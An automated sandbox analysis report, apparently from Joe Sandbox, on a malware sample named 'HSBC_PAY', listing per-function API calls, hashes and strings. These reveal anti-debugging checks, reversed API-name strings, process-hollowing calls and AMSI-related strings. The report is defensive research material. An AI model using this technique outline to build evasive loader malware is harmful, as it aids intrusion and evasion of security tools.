                                                                    • Opcode ID: 3b5b332417f022a8d578378084a8a5257969ef9c5b4de92755dbe9863a414d76
                                                                    • Instruction ID: 66e2aca84a99bc925bb6ac8a3496e658108067750619c21e10395eaa39035e7a
                                                                    • Opcode Fuzzy Hash: 3b5b332417f022a8d578378084a8a5257969ef9c5b4de92755dbe9863a414d76
                                                                    • Instruction Fuzzy Hash: B3F0A471AC0276EEEF90AB69A984B7637DCA381754F0009B9B10C8B944EF758C538B60
                                                                    Function 02A9EBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 10540 2a9ebe8-2a9ec02 GetModuleHandleW 10541 2a9ec2e-2a9ec36 10540->10541 10542 2a9ec04-2a9ec16 GetProcAddress 10540->10542 10542->10541 10543 2a9ec18-2a9ec28 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 2a9ec2a 10543->10544 10544->10541
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KernelBase), ref: 02A9EBF8
                                                                    • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A9EC0A
                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A9EC21
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                    • API String ID: 35162468-539270669
                                                                    • Opcode ID: 139813649dbbf34cbed488e9e206074fda2d2c97e69c022fbe3d520c317a819a
                                                                    • Instruction ID: a0ef1d09218ca59f88764cc906bcc1f5bc67a8fc749b08569ef31a3988f21ed4
                                                                    • Opcode Fuzzy Hash: 139813649dbbf34cbed488e9e206074fda2d2c97e69c022fbe3d520c317a819a
                                                                    • Instruction Fuzzy Hash: 4BF0A73090424CBEEF12E7A98A887DDFBE95B05328F64079594A4711C2EF715640C691
                                                                    Function 02A9DBA8 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DBE3
                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DC13
                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A9DC28
                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A9DC54
                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A9DC5D
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                    • String ID:
                                                                    • API String ID: 1897104825-0
                                                                    • Opcode ID: 948e32f6d4f837fbf280c0e5f50d33b3f6543342388244289c1db1f7352f59a8
                                                                    • Instruction ID: 661705ee5df0a652d176168ca95dd1af1a66e74875ea38428e65b6d8de39c6c4
                                                                    • Opcode Fuzzy Hash: 948e32f6d4f837fbf280c0e5f50d33b3f6543342388244289c1db1f7352f59a8
                                                                    • Instruction Fuzzy Hash: B221C171A907097EEB11FAE5CD46FDE77BDAB09700F500461B700F7180DEB4AA458B55
                                                                    Function 02A9E2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A9E42E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CheckConnectionInternet
                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                    • API String ID: 3847983778-3852638603
                                                                    • Opcode ID: 6db8389c8ffd38ec8a9ceb3f98bddee75860b414fc2c1c1a71a1d88ac785044b
                                                                    • Instruction ID: f34f380d97ca99b661de43d5bc9e0ac6f3d19293a2687343bf3639d78251d375
                                                                    • Opcode Fuzzy Hash: 6db8389c8ffd38ec8a9ceb3f98bddee75860b414fc2c1c1a71a1d88ac785044b
                                                                    • Instruction Fuzzy Hash: E9410D31B90209AFEF10FBA4DA80A9EB7FABF8D710F118426E041A7241DE75AD018F50
                                                                    Function 02A9DAC4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                    • String ID:
                                                                    • API String ID: 3764614163-0
                                                                    • Opcode ID: 1f6acf7709b4dfdc908d70578e9ee0d67250f76e49a44d47c8b5a7b692a7f16b
                                                                    • Instruction ID: c6785edefae38ea10c18ef7103d76d5582e9e8bb3b15cfe836b1bb0244ba39c9
                                                                    • Opcode Fuzzy Hash: 1f6acf7709b4dfdc908d70578e9ee0d67250f76e49a44d47c8b5a7b692a7f16b
                                                                    • Instruction Fuzzy Hash: C221E071A80709BEEB20EAD5CD42F9EB7BDAB09B04F504061B600F71C0DBB46A048A55
                                                                    Function 02A985D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                    • API String ID: 3130163322-2353454454
                                                                    • Opcode ID: aea004784a1957487711b7207a15564106e4b9f85be9ff53c2cbdb86a9cff94e
                                                                    • Instruction ID: b5a99885bfb199e80d9c1c874fbbbeaf354589863b65dd416d777f4c9e87dc89
                                                                    • Opcode Fuzzy Hash: aea004784a1957487711b7207a15564106e4b9f85be9ff53c2cbdb86a9cff94e
                                                                    • Instruction Fuzzy Hash: 8311D3B6640209BFDF80EEA9DD41F9B37EDEB0D710F514454BA08DB640CA38ED118B60
                                                                    Function 02A979AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                    • API String ID: 4072585319-445027087
                                                                    • Opcode ID: f2f447b2300db62da6b85ac2409bcaf307679665876471f68350e450261a1f29
                                                                    • Instruction ID: 3defb2b34520f4f6f125b19322a2f76945fde47f51629097ce83b5226f32e2ed
                                                                    • Opcode Fuzzy Hash: f2f447b2300db62da6b85ac2409bcaf307679665876471f68350e450261a1f29
                                                                    • Instruction Fuzzy Hash: C611FA75690209AFEF00EFA5DD41E9EB7EEEB49710F514460B904D7A40DE34AA118B60
                                                                    Function 02A979AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                    • API String ID: 4072585319-445027087
                                                                    • Opcode ID: 1ab6a63863019b1a0bb544748864e812433abee7cc0290277916f66570d4b1d0
                                                                    • Instruction ID: bf0ae21f37c2e29971fa790d367f7bf76b0507989e205ab5b3706688622bca8d
                                                                    • Opcode Fuzzy Hash: 1ab6a63863019b1a0bb544748864e812433abee7cc0290277916f66570d4b1d0
                                                                    • Instruction Fuzzy Hash: 37111BB5690209BFEF00EFA5DD81E9EBBEEEB4D710F514460B904D7A40DE34EA118B60
                                                                    Function 02A9824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                    • API String ID: 2521977463-737317276
                                                                    • Opcode ID: 448061d778f95a8477ad7b26b0675a525a418a0df147b980ca1efa67cc556532
                                                                    • Instruction ID: 3731d9d0ebed615faa801559a9f3163fd4b29391a907185aa4618161d2524d4a
                                                                    • Opcode Fuzzy Hash: 448061d778f95a8477ad7b26b0675a525a418a0df147b980ca1efa67cc556532
                                                                    • Instruction Fuzzy Hash: 82012975680209AFEF40EFA9D941E9EBBEEEB4D710F914460F504D7640DE38ED118B64
                                                                    Function 02A97CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                    • API String ID: 2719805696-3542721025
                                                                    • Opcode ID: 45f2eb0ff4faf45a7f7b70f4577bc6a923ca5ad4f98dba754d9f0c69bc6dbc7c
                                                                    • Instruction ID: 7853b71ab72d62899ab2e2eba8f4b3ca1d3b08408479cd24a0e38c0c236e919b
                                                                    • Opcode Fuzzy Hash: 45f2eb0ff4faf45a7f7b70f4577bc6a923ca5ad4f98dba754d9f0c69bc6dbc7c
                                                                    • Instruction Fuzzy Hash: 990117B4690209AFEF40EF99DD41EAABBEDEB4D710F914460B404D7A80DE34AD118F64
                                                                    Function 02A984BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                    • API String ID: 3503870465-2520021413
                                                                    • Opcode ID: 011e4fcca9a203745fe44255e1b017c13aa658bd023b777acbb76020484ad677
                                                                    • Instruction ID: 177f68ac971dfb242642cafd4b566c759cffb27aa1c00eb2171a67c2ddb339a2
                                                                    • Opcode Fuzzy Hash: 011e4fcca9a203745fe44255e1b017c13aa658bd023b777acbb76020484ad677
                                                                    • Instruction Fuzzy Hash: 80014F74680205BFEF00EBA5D941A5EBBEEEB4E710F914860B40497A00DE38AD158B60
                                                                    Function 02A9D9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                    • NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                    • String ID:
                                                                    • API String ID: 1459852867-0
                                                                    • Opcode ID: 74f9540c5dc09c80b3f6db5d78571921c448c9b49d5247bfa23aa71cd6aa4c78
                                                                    • Instruction ID: 9775747570ff3c82d351c3ac9a0a37674f0a5ad85c0e030523016d6c3b59ecc4
                                                                    • Opcode Fuzzy Hash: 74f9540c5dc09c80b3f6db5d78571921c448c9b49d5247bfa23aa71cd6aa4c78
                                                                    • Instruction Fuzzy Hash: DB014F759887486EEF05F6A1CA81BDD7BF9AB45704F5040929200E7491EE74AB158B21
                                                                    Function 02A9DA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02A9DA64
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DAB6), ref: 02A9DA7A
                                                                    • NtDeleteFile.NTDLL(?), ref: 02A9DA99
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                    • String ID:
                                                                    • API String ID: 1694942484-0
                                                                    • Opcode ID: d93cba26bbefa38cec30dca8f3a9a99f5659d8ba16b9852fbecdf63fcbd269e7
                                                                    • Instruction ID: 0006efe037d669719be3d23e68fc3a40976d5932e3c140f156aad073328d0b2b
                                                                    • Opcode Fuzzy Hash: d93cba26bbefa38cec30dca8f3a9a99f5659d8ba16b9852fbecdf63fcbd269e7
                                                                    • Instruction Fuzzy Hash: D6012C71A44608BEEF10FAE1CE42FCEB7FDEB08700F904461A600E2580EE74AB148A60
                                                                    Function 02A96D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A96CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02A96D39,?,?,?,00000000), ref: 02A96D19
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02A96E2C,00000000,00000000,02A96DAB,?,00000000,02A96E1B), ref: 02A96D97
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
